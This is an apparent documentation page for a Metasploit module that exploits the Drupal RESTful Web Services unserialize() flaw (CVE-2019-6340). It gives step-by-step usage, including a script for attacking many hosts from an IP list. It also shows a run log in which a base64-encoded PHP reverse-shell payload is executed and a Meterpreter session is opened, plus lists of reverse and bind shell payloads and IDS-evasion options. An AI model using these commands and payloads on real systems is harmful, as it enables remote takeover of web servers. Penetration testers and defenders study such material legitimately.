Drupal RESTful Web Services unserialize() RCE - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/drupal_restws_unserialize metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Drupal RESTful Web Services unserialize() RCE
Module: exploit/unix/webapp/drupal_restws_unserialize
Source code: modules/exploits/unix/webapp/drupal_restws_unserialize.rb
Disclosure date: 2019-02-20
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): php, cmd
Supported platform(s): PHP, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-6340

This module is also known as SA-CORE-2019-003.

This module exploits a PHP unserialize() vulnerability in Drupal RESTful Web Services by sending a crafted request to the /node REST endpoint. As per SA-CORE-2019-003, the initial remediation was to disable POST, PATCH, and PUT, but Ambionics discovered that GET was also vulnerable (albeit cached). Cached nodes can be exploited only once. Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of this alternate vector. Drupal < 8.5.11 and < 8.6.10 are vulnerable.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Reliability:

  • unreliable-session: The module isn't expected to get a shell reliably (such as only once).

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using drupal_restws_unserialize against a single host

Normally, you can use exploit/unix/webapp/drupal_restws_unserialize this way:

msf > use exploit/unix/webapp/drupal_restws_unserialize
msf exploit(drupal_restws_unserialize) > show targets
    ... a list of targets ...
msf exploit(drupal_restws_unserialize) > set TARGET target-id
msf exploit(drupal_restws_unserialize) > show options
    ... show and set options ...
msf exploit(drupal_restws_unserialize) > exploit

Using drupal_restws_unserialize against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your drupal_restws_unserialize will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/drupal_restws_unserialize")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Introduction


This module exploits a PHP unserialize() vulnerability in Drupal RESTful Web Services by sending a crafted request to the /node REST endpoint.

As per SA-CORE-2019-003, the initial remediation was to disable POST, PATCH, and PUT, but Ambionics discovered that GET was also vulnerable (albeit cached).

Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of this alternate vector.

Drupal < 8.5.11 and < 8.6.10 are vulnerable.

Setup


docker run -dp 80:80 drupal:8.6.9 and enable the HAL, HTTP Basic Authentication, RESTful Web Services, and Serialization modules at /admin/modules.

Clear all caches at /admin/config/development/performance to repeat exploitation if targeted nodes are cached.

Targets


Id  Name
--  ----
0   PHP In-Memory
1   Unix In-Memory

Options


METHOD

Set this to the HTTP method to use. POST and GET (cached) are known to work.

NODE

Set this to a node ID on the target when using the GET method.

DUMP_OUTPUT

Enable this if you'd like to see HTTP responses, including command output. Defaults to false unless cmd/unix/generic is your payload.

Usage


msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo 2oZashoKJTvVkPgkVLcTaehAdiv
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:55653) at 2019-03-05 19:26:37 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/drupal_restws_unserialize exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/drupal_restws_unserialize

[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_restws_unserialize) > show info

       Name: Drupal RESTful Web Services unserialize() RCE
     Module: exploit/unix/webapp/drupal_restws_unserialize
   Platform: PHP, Unix
       Arch: php, cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-02-20

Provided by:
  Jasper Mattsson
  Charles Fol
  Rotem Reiss
  wvu <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 unreliable-session

Available targets:
  Id  Name
  --  ----
  0   PHP In-Memory
  1   Unix In-Memory

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  METHOD       POST             yes       HTTP method to use (Accepted: GET, POST, PATCH, PUT)
  NODE         1                no        Node ID to target with GET method
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a PHP unserialize() vulnerability in Drupal 
  RESTful Web Services by sending a crafted request to the /node REST 
  endpoint. As per SA-CORE-2019-003, the initial remediation was to 
  disable POST, PATCH, and PUT, but Ambionics discovered that GET was 
  also vulnerable (albeit cached). Cached nodes can be exploited only 
  once. Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify 
  users of this alternate vector. Drupal < 8.5.11 and < 8.6.10 are 
  vulnerable.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-6340
  https://www.drupal.org/sa-core-2019-003
  https://www.drupal.org/psa-2019-02-22
  https://www.ambionics.io/blog/drupal8-rce
  https://github.com/ambionics/phpggc
  https://twitter.com/jcran/status/1099206271901798400

Also known as:
  SA-CORE-2019-003

Module Options


This is a complete list of options available in the unix/webapp/drupal_restws_unserialize exploit:

msf6 exploit(unix/webapp/drupal_restws_unserialize) > show options

Module options (exploit/unix/webapp/drupal_restws_unserialize):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   METHOD       POST             yes       HTTP method to use (Accepted: GET, POST, PATCH, PUT)
   NODE         1                no        Node ID to target with GET method
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/drupal_restws_unserialize exploit:

msf6 exploit(unix/webapp/drupal_restws_unserialize) > show advanced

Module advanced options (exploit/unix/webapp/drupal_restws_unserialize):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   AutoCheck               true                                                no        Run check before exploit
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   ForceExploit            false                                               no        Override check result
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/drupal_restws_unserialize module can exploit:

msf6 exploit(unix/webapp/drupal_restws_unserialize) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   PHP In-Memory
   1   Unix In-Memory

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/drupal_restws_unserialize exploit:

msf6 exploit(unix/webapp/drupal_restws_unserialize) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/drupal_restws_unserialize exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/drupal_restws_unserialize) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not determine Drupal version


Here is a relevant code snippet related to the "Could not determine Drupal version" error message:

87:	    checkcode = CheckCode::Unknown
88:	
89:	    version = drupal_version
90:	
91:	    unless version
92:	      vprint_error('Could not determine Drupal version')
93:	      return checkcode
94:	    end
95:	
96:	    if version.to_s !~ /^8\b/
97:	      vprint_error("Drupal #{version} is not supported")

Drupal <VERSION> is not supported


Here is a relevant code snippet related to the "Drupal <VERSION> is not supported" error message:

92:	      vprint_error('Could not determine Drupal version')
93:	      return checkcode
94:	    end
95:	
96:	    if version.to_s !~ /^8\b/
97:	      vprint_error("Drupal #{version} is not supported")
98:	      return CheckCode::Safe
99:	    end
100:	
101:	    vprint_status("Drupal #{version} targeted at #{full_uri}")
102:	    checkcode = CheckCode::Detected

Could not determine Drupal patch level


Here is a relevant code snippet related to the "Could not determine Drupal patch level" error message:

102:	    checkcode = CheckCode::Detected
103:	
104:	    changelog = drupal_changelog(version)
105:	
106:	    unless changelog
107:	      vprint_error('Could not determine Drupal patch level')
108:	      return checkcode
109:	    end
110:	
111:	    case drupal_patch(changelog, 'SA-CORE-2019-003')
112:	    when nil

CHANGELOG.txt no longer contains patch level


Here is a relevant code snippet related to the "CHANGELOG.txt no longer contains patch level" error message:

108:	      return checkcode
109:	    end
110:	
111:	    case drupal_patch(changelog, 'SA-CORE-2019-003')
112:	    when nil
113:	      vprint_warning('CHANGELOG.txt no longer contains patch level')
114:	    when true
115:	      vprint_warning('Drupal appears patched in CHANGELOG.txt')
116:	      checkcode = CheckCode::Safe
117:	    when false
118:	      vprint_good('Drupal appears unpatched in CHANGELOG.txt')

Drupal appears patched in CHANGELOG.txt


Here is a relevant code snippet related to the "Drupal appears patched in CHANGELOG.txt" error message:

110:	
111:	    case drupal_patch(changelog, 'SA-CORE-2019-003')
112:	    when nil
113:	      vprint_warning('CHANGELOG.txt no longer contains patch level')
114:	    when true
115:	      vprint_warning('Drupal appears patched in CHANGELOG.txt')
116:	      checkcode = CheckCode::Safe
117:	    when false
118:	      vprint_good('Drupal appears unpatched in CHANGELOG.txt')
119:	      checkcode = CheckCode::Appears
120:	    end

Enabling DUMP_OUTPUT for cmd/unix/generic


Here is a relevant code snippet related to the "Enabling DUMP_OUTPUT for cmd/unix/generic" error message:

136:	    checkcode
137:	  end
138:	
139:	  def exploit
140:	    if datastore['PAYLOAD'] == 'cmd/unix/generic'
141:	      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
142:	      # XXX: Naughty datastore modification
143:	      datastore['DUMP_OUTPUT'] = true
144:	    end
145:	
146:	    case target['Type']

If you did not get code execution, try a new node ID


Here is a relevant code snippet related to the "If you did not get code execution, try a new node ID" error message:

183:	    case res.code
184:	    # 401 isn't actually a failure when using the POST method
185:	    when 200, 401
186:	      print_line(res.body) if datastore['DUMP_OUTPUT']
187:	      if meth == 'GET'
188:	        print_warning('If you did not get code execution, try a new node ID')
189:	      end
190:	    when 404
191:	      print_error("#{node_uri} not found")
192:	    when 405
193:	      print_error("#{meth} method not allowed")

<NODE_URI> not found


Here is a relevant code snippet related to the "<NODE_URI> not found" error message:

186:	      print_line(res.body) if datastore['DUMP_OUTPUT']
187:	      if meth == 'GET'
188:	        print_warning('If you did not get code execution, try a new node ID')
189:	      end
190:	    when 404
191:	      print_error("#{node_uri} not found")
192:	    when 405
193:	      print_error("#{meth} method not allowed")
194:	    when 422
195:	      print_error('VHOST may need to be set')
196:	    when 406

<METH> method not allowed


Here is a relevant code snippet related to the "<METH> method not allowed" error message:

188:	        print_warning('If you did not get code execution, try a new node ID')
189:	      end
190:	    when 404
191:	      print_error("#{node_uri} not found")
192:	    when 405
193:	      print_error("#{meth} method not allowed")
194:	    when 422
195:	      print_error('VHOST may need to be set')
196:	    when 406
197:	      print_error('Web Services may not be enabled')
198:	    else

VHOST may need to be set


Here is a relevant code snippet related to the "VHOST may need to be set" error message:

190:	    when 404
191:	      print_error("#{node_uri} not found")
192:	    when 405
193:	      print_error("#{meth} method not allowed")
194:	    when 422
195:	      print_error('VHOST may need to be set')
196:	    when 406
197:	      print_error('Web Services may not be enabled')
198:	    else
199:	      print_error("Unexpected reply: #{res.inspect}")
200:	    end

Web Services may not be enabled


Here is a relevant code snippet related to the "Web Services may not be enabled" error message:

192:	    when 405
193:	      print_error("#{meth} method not allowed")
194:	    when 422
195:	      print_error('VHOST may need to be set')
196:	    when 406
197:	      print_error('Web Services may not be enabled')
198:	    else
199:	      print_error("Unexpected reply: #{res.inspect}")
200:	    end
201:	
202:	    res

Unexpected reply: <RES.INSPECT>


Here is a relevant code snippet related to the "Unexpected reply: <RES.INSPECT>" error message:

194:	    when 422
195:	      print_error('VHOST may need to be set')
196:	    when 406
197:	      print_error('Web Services may not be enabled')
198:	    else
199:	      print_error("Unexpected reply: #{res.inspect}")
200:	    end
201:	
202:	    res
203:	  end
204:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Jasper Mattsson
  • Charles Fol
  • Rotem Reiss
  • wvu

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.